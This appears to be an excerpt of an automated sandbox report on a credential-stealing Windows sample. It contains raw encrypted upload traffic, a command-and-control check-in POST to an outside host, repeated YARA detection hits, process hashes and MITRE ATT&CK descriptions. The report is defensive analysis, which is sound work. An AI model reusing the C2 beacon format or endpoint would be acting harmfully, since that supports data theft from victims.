2025-01-13 07:34:36 UTC	15331	OUT	Data Raw: cf a7 c5 2d 6f dd cc 83 44 e5 7e be ab 4f ad a3 17 73 45 da 27 3d 90 fa 6b 6c a6 92 bf f0 c6 4c 7f 48 40 0c 76 4f 61 7e 28 45 f0 a7 4f 8e 81 ce dc d7 62 a3 70 a5 03 ed d7 e0 ae b4 70 05 bd 43 5b d9 de e1 09 ca 63 1b 77 87 70 1d 42 ab 49 0f e6 f7 a8 52 c3 c3 c3 f1 0b 0d f2 54 f4 1d 59 da 78 0f 37 1a 04 a2 69 fb 09 2e ff 40 36 9d 20 6e ae b2 c0 fc ce b8 eb e0 10 84 98 00 62 35 f6 80 33 23 79 37 d7 16 e6 26 a3 7e 43 22 a7 19 da aa 59 be c6 57 24 ce 34 af dc 0a 75 8b 40 82 64 c6 e0 d6 c8 e0 6d d0 2a bb 5f 0a c8 9c 58 38 a1 0f 98 3e 5f f0 2c 1e c2 34 f9 5e 66 30 b1 72 36 7c 79 9f 8f f8 b5 69 29 c0 61 ce 3e fb f8 dd ef 53 f6 e9 66 7a de e1 5f da ed b0 bf b7 53 a6 d7 80 b4 d2 15 f2 17 f7 5f cd be e5 7f a5 72 83 27 6a 36 96 f6 10 35 fb b7 7c 22 51 e3 aa 00 e3 68 Data Ascii: -oD~OsE'=klLH@vOa~(EObppC[cwpBIRTYx7i.@6 nb53#y7&~C"YW$4u@dm*_X8>_,4^f0r6\|yi)a>Sfz_S_r'j65\|"Qh
2025-01-13 07:34:36 UTC	15331	OUT	Data Raw: e4 c5 06 d5 09 ee 2a 63 5b 0a 26 ed ac 69 7f 1a 71 30 fe 36 51 71 cd ac 35 c2 3d 9a f3 93 1b ff 85 24 1b 9a a0 d4 e0 a0 fa f5 a7 50 89 a0 33 46 72 d1 2e c3 76 df 50 3a 32 1f b7 c7 1d 6d 4c 59 15 2e d7 b4 a6 4b e8 67 b2 cb d7 7a 56 5e 38 66 fd b5 33 3b c8 f1 f6 9b 0f cc 43 f3 5d 06 3e fd 4a 3b cf ac fd 7e ff 9a 14 0c 5a 19 59 29 1d dc 76 f1 ab 93 b4 7f 6b 4c df 31 9e 14 23 97 a8 6d 93 b3 03 f6 ca 16 0d b1 2a 7c 25 ee dd df fb 2c b8 52 0c 98 e9 53 2d 71 36 c9 80 b4 c2 fa 52 11 a7 c7 6a df 2b b9 b5 0c 16 74 70 73 03 ae 10 18 9c 47 83 00 d7 9f 80 61 7a 27 49 d3 05 2c 3c 69 54 76 d1 00 bf 4b 11 b7 e8 01 98 b7 fe dc 03 48 e6 36 e8 12 10 40 66 fc 4f 34 e3 b1 08 fd 32 a0 f5 03 78 40 a8 0b 05 bc 3e 05 01 86 cb 0d 38 95 1f f4 de 2d 83 52 b4 20 3b 46 f6 2f a7 3f 78 Data Ascii: c[&iq06Qq5=$P3Fr.vP:2mLY.KgzV^8f3;C]>J;~ZY)vkL1#m\|%,RS-q6Rj+tpsGaz'I,<iTvKH6@fO42x@>8-R ;F/?x
2025-01-13 07:34:36 UTC	15331	OUT	Data Raw: 54 81 71 b1 dc d7 59 77 4e af f3 4c ae 7b b3 a3 70 d7 8c 9f e3 b3 e9 c0 dc d2 30 bb 67 0a 7e 6e 56 42 f9 cd 6f 42 ef b3 e5 a7 2c 9a 5f 46 9c 32 d3 f3 a7 b6 4c 5d 59 23 e5 90 8a c3 f4 be 6e 7c 7e da 9b f6 39 1a 4e 7a 37 4e a5 09 55 68 14 a3 e2 8b 3f e0 fb 91 f8 78 b6 6c b6 c3 10 13 f9 b0 b8 5c 99 4a 35 c4 31 c7 72 ab 05 4d 14 bc 85 26 c6 16 37 25 3a cb 27 fa c3 3a 32 1d 57 2e 87 9d 8b f4 d7 c2 4c 9e 2e 4d f9 5d 56 eb 46 3d 5c 26 60 91 7b 99 92 36 18 38 ad 68 ab 72 d6 77 ec bf dc 81 b5 fb a1 52 98 ba a1 a7 f1 67 81 d7 df d0 ff 26 b0 fe bf 0f 5c 4f 03 f9 f2 78 bd df 10 ad d4 68 06 a4 37 11 63 df 88 03 99 9e 9e 5c ef 00 50 e7 ba fb e8 6b 7a 70 73 00 9a fa 2f ec 2a 1a 23 05 6f 77 0a 42 d8 b9 cc 39 79 46 e7 5f 87 f5 46 77 62 38 11 60 43 82 2b a4 b8 70 05 c0 ff Data Ascii: TqYwNL{p0g~nVBoB,_F2L]Y#n\|~9Nz7NUh?xl\J51rM&7%:':2W.L.M]VF=\&`{68hrwRg&\Oxh7c\Pkzps/*#owB9yF_Fwb8`C+p
2025-01-13 07:34:36 UTC	15331	OUT	Data Raw: f1 e0 bf fd 81 66 a3 f0 37 95 6a 6a 84 32 c9 dd 0d 6a be 86 9d 52 1e 2c d3 22 3d 7c dd d4 25 e7 f6 20 22 18 03 ff 10 19 20 69 83 2c 85 e5 a9 7a f3 90 e7 24 bb 31 65 f2 ab 66 02 f0 c6 72 22 bc d2 c6 b9 27 8e 6b ce 22 b9 16 76 db 6e 16 c2 39 7d 50 ea 5d d5 92 4d 54 3d 8c ba 66 21 56 e5 e6 5d 9a fe 67 4b 01 aa cc cc b9 b1 b4 b8 4d b1 59 bb 3a 52 27 3f d7 57 43 62 07 df 88 5b aa 57 7c 04 0c 87 fe 43 ba 30 96 0b d3 e1 70 10 14 19 0c 42 89 1d cf ea fa 66 3a f8 b9 c5 59 0c cf 2a 3d cc c4 b4 cf 14 d2 7a 0c bd 33 2f fa 9f 1e 38 88 9a 56 76 26 80 07 4c 92 0b fa 42 97 8b 62 84 14 38 a3 67 96 6f 11 90 05 88 43 f6 d4 29 be ed a0 c6 1f 28 89 ae bd 12 4f 68 75 0e 6d a3 1f 41 2f 8e 7f 2f 58 a0 99 9a 62 43 8b 0e d7 98 d3 cd 5a 9d 8c 9c 0e 9a e5 d7 57 66 d9 94 70 03 6a 9b Data Ascii: f7jj2jR,"=\|% " i,z$1efr"'k"vn9}P]MT=f!V]gKMY:R'?WCb[W\|C0pBf:Y*=z3/8Vv&LBb8goC)(OhumA//XbCZWfpj
2025-01-13 07:34:36 UTC	15331	OUT	Data Raw: b8 3b 7e 09 cc f6 7a b8 9f c6 8d 1a cb 14 01 f7 d9 73 8f af 7e 18 62 eb 72 2f 2e 77 44 a4 3d 54 a6 c9 a1 4f 39 c0 b9 42 ac d6 97 42 01 3c 71 a7 65 1f 04 36 8b 18 3d af 81 e3 0d 75 3f 03 a6 18 60 54 5b 1c c8 d7 40 03 11 84 03 ee 99 a5 a0 18 5f f9 80 a3 9f df 96 59 05 5a f3 cd 4d 02 85 c7 c6 70 28 be 17 da b6 48 2b 0f 7c 27 62 50 29 9b 34 25 ac 16 19 6e f0 62 f4 ef 14 45 5d 24 5b 88 f3 8c 75 c0 04 58 e1 f5 b2 cd 12 b6 ce 1f 90 7a c7 07 67 22 76 84 ca 98 40 c1 be e3 2b ef 42 5d c0 29 69 a0 86 8d 54 01 f0 55 2b 84 25 5b 60 00 ee a9 ac de 1e 90 4d f4 3a ab 05 05 d1 e1 16 5f 88 b1 47 98 6a 80 ce c7 83 f3 1e e8 d4 e2 71 d9 2c 13 65 9a 28 d8 8e 69 7c 0e 65 93 5b 52 4f 6f 3d d9 a6 52 99 a1 1d b7 f8 b6 21 2f 51 8a b6 17 45 4d 99 71 81 c8 83 69 71 28 83 68 1a 61 49 Data Ascii: ;~zs~br/.wD=TO9BB<qe6=u?`T[@_YZMp(H+\|'bP)4%nbE]$[uXzg"v@+B])iTU+%[`M:_Gjq,e(i\|e[ROo=R!/QEMqiq(haI
2025-01-13 07:34:36 UTC	15331	OUT	Data Raw: 69 dc 1c 98 8c 64 6f cd de 67 af cd c5 87 2e 2c a5 59 7a 0e d6 51 b8 2e ad 06 fd 7e e6 ed 9c e9 b7 d9 eb 8f 2b ee 3f 4b a4 10 b5 3d 63 79 d1 6d df 67 8c 2c 82 2d 84 c0 ca 74 c5 7a c3 80 79 b3 51 88 35 8a a7 00 38 26 ed f6 5f 11 42 80 81 3b ff ef 78 59 c1 26 62 e3 e9 ea ef 45 84 cb e5 cc bf 8d fe f3 9b e8 3f dc 20 46 c5 b7 e0 98 b8 f9 c4 77 92 ec 3e 0e b5 51 f8 70 66 3e 8e 2e b1 ad ea 5f 3a 5d 51 77 e0 39 7f 82 96 0f 02 0a fe df 67 c9 da 2b 6c 25 d7 4a 60 99 9c 8f 01 a3 47 e8 d1 42 40 12 b5 67 79 ef 03 b4 cf 4e 5a aa 04 e7 a4 23 eb df 7f 4c a9 51 a1 e7 85 05 f9 40 7a 09 77 f9 d8 7c 27 aa f7 f8 c0 5e 1f f6 9f c7 a1 aa c4 76 ad 8d d4 bd a8 bf 86 2b ce bb 43 1d db 44 d4 a1 85 d3 7d 4a db 18 88 ca c5 24 ed a7 d9 10 c2 51 a2 c9 27 e7 fa ca 21 7f 5f ec a4 02 b5 Data Ascii: idog.,YzQ.~+?K=cymg,-tzyQ58&_B;xY&bE? Fw>Qpf>._:]Qw9g+l%J`GB@gyNZ#LQ@zw\|'^v+CD}J$Q'!_
2025-01-13 07:34:36 UTC	15331	OUT	Data Raw: 29 a5 97 b4 c4 c9 9e 2b 11 44 7c c7 47 6f ef b5 1f e5 8c 89 81 92 5b 56 a6 01 a4 49 ae f1 5d 0e d7 e4 5d 49 6f dc c5 cb 82 51 d8 65 93 73 c1 cd 26 3b 55 32 53 49 55 65 bf 15 e1 f7 35 f3 d7 1f a4 8b 93 5e 7a 24 ce 6c ef d6 44 c7 97 3a 76 b7 28 29 ba 03 02 0b d7 95 1e 77 ca 32 86 5e 36 6c 1c 17 49 c4 fd 3b f1 d3 f5 ef b5 12 44 a5 af 51 fc 40 18 60 94 a1 f8 d0 9a 04 18 fe 9b d0 18 be 9d 51 f4 40 92 9a 61 a1 a9 38 52 25 d8 47 6a 1d be 3a da c1 67 dc e9 4f 11 e2 18 93 0b 24 ef 41 55 5f 55 e3 43 35 a9 3b 6b 8d a3 76 c7 86 73 c5 62 4a 42 f0 ba 17 7e 1f 4d 47 53 79 d7 f8 87 5e 20 66 db 58 3d f2 fa 5c e8 99 d0 15 f9 15 f3 95 4a d6 2c 1e ab dc 6e 93 b2 22 38 92 d6 3a 15 6d c1 eb 17 21 5c e3 29 8e 2a cd 7d 39 0c 4d fd 0e f8 df 0c a3 45 0e 38 bb 70 6f e4 87 b2 6c 3a Data Ascii: )+D\|Go[VI]]IoQes&;U2SIUe5^z$lD:v()w2^6lI;DQ@`Q@a8R%Gj:gO$AU_UC5;kvsbJB~MGSy^ fX=\J,n"8:m!\)*}9ME8pol:
2025-01-13 07:34:36 UTC	15331	OUT	Data Raw: 2a 24 02 4d e1 93 1a 8d a5 a2 71 ff 48 1c dd 1c f5 03 b1 e4 74 bc d8 0b 39 47 ba c8 8e 1f ca 34 44 38 b8 44 99 16 5f 7e 29 08 7d f0 56 03 1f 75 7f 83 ae 7a 0b 49 aa 51 76 39 23 69 53 99 e7 e9 32 d5 53 8a d4 41 3d 21 fd fa eb f9 1a 36 2c 29 1b 78 9b 18 f0 7a 20 06 ec 3d 6b 3c 23 19 7a a2 a0 34 ea 6a 87 5e a7 0d c2 f2 11 f0 30 74 92 08 2e 8f a0 b4 6e 42 c1 1b c5 0f 95 f3 89 a1 99 fb ad a9 e9 1b 08 35 3f 90 44 fb 3c 60 94 0b 17 9b cd af db 4b ae 48 60 24 f9 c8 cf 08 2d 13 20 47 e2 5a c8 d3 c3 93 44 3d d4 51 3d 01 e0 e3 78 eb 24 c8 3d 01 a7 76 62 6a c8 9d ce bb bf 4b c2 b6 c9 5a 0a 53 2b 41 38 b7 07 c9 98 63 c2 11 7d 3f fc 20 36 36 e8 1c a6 3e a8 91 b1 df 25 f2 37 e6 31 01 1c a5 27 b7 ca 80 13 db b2 51 94 0b b2 38 6e 7e 08 19 df 66 18 f2 28 ee da b6 3e 25 37 Data Ascii: *$MqHt9G4D8D_~)}VuzIQv9#iS2SA=!6,)xz =k<#z4j^0t.nB5?D<`KH`$- GZD=Q=x$=vbjKZS+A8c}? 66>%71'Q8n~f(>%7
2025-01-13 07:34:36 UTC	15331	OUT	Data Raw: 74 72 21 95 69 a1 b0 65 74 2d 6f 92 bd dc 2d d2 1c 7a 2f ae 5b ae b8 45 24 e1 8c ea 96 b9 93 26 82 45 e5 36 24 4c 12 85 c6 87 fa 0a ac 3b f7 38 e7 dd f6 30 20 2c b8 55 e5 0e aa b9 be 96 18 74 68 96 25 b7 d5 c7 fc 96 71 b0 51 51 0a ad e3 2b 99 08 08 73 81 ee 1e 99 fb ae e9 1b 34 eb 87 6d a3 5a 42 70 20 e7 b7 16 b5 a3 58 10 30 a7 18 99 f9 9c 24 bc 4c 46 8c fc 7e 0b b9 55 2c f8 29 5f 30 72 ff 2b cb 1e 75 04 e2 ee d7 87 02 de c7 46 04 76 fe d5 12 3e 2f 08 9c 59 14 a4 04 b8 87 94 04 78 5f 25 ac 70 04 5b 1e e2 43 22 c4 20 59 7d 2b e6 f4 60 f8 cd f5 5f 50 57 99 ca 34 ff ce fa 27 65 bb ca cc 69 7e 42 e5 9a 92 5d a5 3b ef 0b 8e 33 f9 d6 8f 40 66 cb 2a a3 6a 85 56 46 aa 23 da 79 23 ee e6 2c 64 6c bf 6f e0 f1 7f ee 6d 79 b1 2a 30 7d db 69 cd ac 1c 98 f1 c8 c2 c3 9c Data Ascii: tr!iet-o-z/[E$&E6$L;80 ,Uth%qQQ+s4mZBp X0$LF~U,)_0r+uFv>/Yx_%p[C" Y}+`_PW4'ei~B];3@fjVF#y#,dlomy0}i
2025-01-13 07:34:38 UTC	1131	IN	HTTP/1.1 200 OK Date: Mon, 13 Jan 2025 07:34:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=6qqmu0o02dobctibamp6b0bh0i; expires=Fri, 09 May 2025 01:21:17 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=q94HmVaysnWN5TDuA5rKJO6BC9gge9YL0f1euIdPmAb2otewDhfgL96YxtsdSiS56XFaTrdXznISWJyZj%2F9QMYUwjxI13e0cvKXU9zU%2FqZ2VRv8HfAbVJgh0WaPq93BsPEnaQwB3"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9013b46f9fbd42cb-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1666&min_rtt=1652&rtt_var=649&sent=193&recv=571&lost=0&retrans=0&sent_bytes=2847&recv_bytes=553595&delivery_rate=1648785&cwnd=163&unsent_bytes=0&cid=a96d3381eb54c3ce&ts=1571&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49737	172.67.134.197	443	2596	C:\Windows\SysWOW64\dxdiag.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-13 07:34:38 UTC	267	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 80 Host: fixxyplanterv.click
2025-01-13 07:34:38 UTC	80	OUT	Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 5a 71 63 68 4f 61 2d 2d 6e 65 77 26 6a 3d 26 68 77 69 64 3d 41 31 30 33 30 44 44 36 32 38 34 36 42 35 42 37 35 45 43 36 34 36 38 43 35 43 39 36 33 32 34 39 Data Ascii: act=get_message&ver=4.0&lid=ZqchOa--new&j=&hwid=A1030DD62846B5B75EC6468C5C963249
2025-01-13 07:34:39 UTC	1131	IN	HTTP/1.1 200 OK Date: Mon, 13 Jan 2025 07:34:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=sktgf1d8j84hdtcsvctf4oboss; expires=Fri, 09 May 2025 01:21:18 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=evHmpObdjmnpTIpaAa3A1744JG059uwpU%2FgdRZ5jjhDv7cWNT9i4cWVXENLAWbBtJtD%2BpawsG%2FFb5DkCGDAYjPgUNbNmJqVwgH4sEwVgDF64dza3p%2F5EQ2UuwnZokkQ%2F3e7%2BVMy0"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9013b47cee6c7c9a-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1795&min_rtt=1789&rtt_var=683&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=983&delivery_rate=1588683&cwnd=195&unsent_bytes=0&cid=e332711daf1219ff&ts=452&x=0"
2025-01-13 07:34:39 UTC	54	IN	Data Raw: 33 30 0d 0a 30 59 79 47 4d 56 61 50 6f 6f 6e 38 2f 58 56 6b 53 46 50 56 50 58 78 49 5a 33 71 57 71 79 4b 6e 4a 63 37 77 2f 4d 4d 6e 38 39 43 4b 30 51 3d 3d 0d 0a Data Ascii: 300YyGMVaPoon8/XVkSFPVPXxIZ3qWqyKnJc7w/MMn89CK0Q==
2025-01-13 07:34:39 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	02:34:24
Start date:	13/01/2025
Path:	C:\Users\user\Desktop\WSLRT.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\WSLRT.exe"
Imagebase:	0x7ff73e980000
File size:	12'697'600 bytes
MD5 hash:	7DADBF556492F9DE788752000420C6F6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	02:34:26
Start date:	13/01/2025
Path:	C:\Windows\SysWOW64\dxdiag.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\dxdiag.exe"
Imagebase:	0x160000
File size:	222'720 bytes
MD5 hash:	24D3F0DB6CCF0C341EA4F6B206DF2EDF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000003.1924594667.0000000003450000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000003.1902872299.0000000003450000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000003.1925146540.0000000003450000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000003.1924702653.0000000003450000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000003.1921681897.0000000003450000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000003.1922204202.0000000003450000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000003.1905255414.0000000003450000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000003.1921228817.0000000003450000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000003.1922641260.0000000003450000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000003.1923050702.0000000003450000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000003.1923396438.0000000003450000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000003.1891726210.0000000003450000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000003.1878943431.0000000003450000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000003.1923653553.0000000003450000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000003.1923498896.0000000003450000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000003.1924143105.0000000003450000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000003.1879080551.0000000003458000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000003.1904508771.0000000003450000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000003.1921443405.0000000003450000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000003.1922521115.0000000003450000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000003.1923232078.0000000003450000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000003.1924823683.0000000003450000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000003.1922785286.0000000003450000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000003.1892683034.0000000003450000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000003.1891776601.0000000003458000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000003.1903267214.0000000003450000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000003.1921325690.0000000003450000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000003.1922026178.0000000003450000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000003.1922340035.0000000003450000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000003.1903451242.0000000003450000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000003.1923981712.0000000003450000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	true

Show Windows behavior

Function 00007FF73E9FE1EC Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FF73E9FE218
GetCurrentThreadId.KERNEL32 ref: 00007FF73E9FE226
GetCurrentProcessId.KERNEL32 ref: 00007FF73E9FE232
QueryPerformanceCounter.KERNEL32 ref: 00007FF73E9FE242

Memory Dump Source

Source File: 00000000.00000002.1855658203.00007FF73E981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73E980000, based on PE: true

Associated: 00000000.00000002.1855641670.00007FF73E980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855712338.00007FF73EA16000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1856394795.00007FF73F416000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1856494803.00007FF73F550000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1856517474.00007FF73F554000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1856537054.00007FF73F559000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff73e980000_WSLRT.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: 7e596a65cd8e17808020fb542f6b4a484e8f8de5a7da433294868d664068b27d
Instruction ID: 58ce4105369142a0a709a2dbf0b0b1b43fe96b8de978633c2f10693290af35a5
Opcode Fuzzy Hash: 7e596a65cd8e17808020fb542f6b4a484e8f8de5a7da433294868d664068b27d
Instruction Fuzzy Hash: 0B115E22B15F4699EB00DF60E8542B873A4F7597A8F840E31EA2D467A4DF38D1548350

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

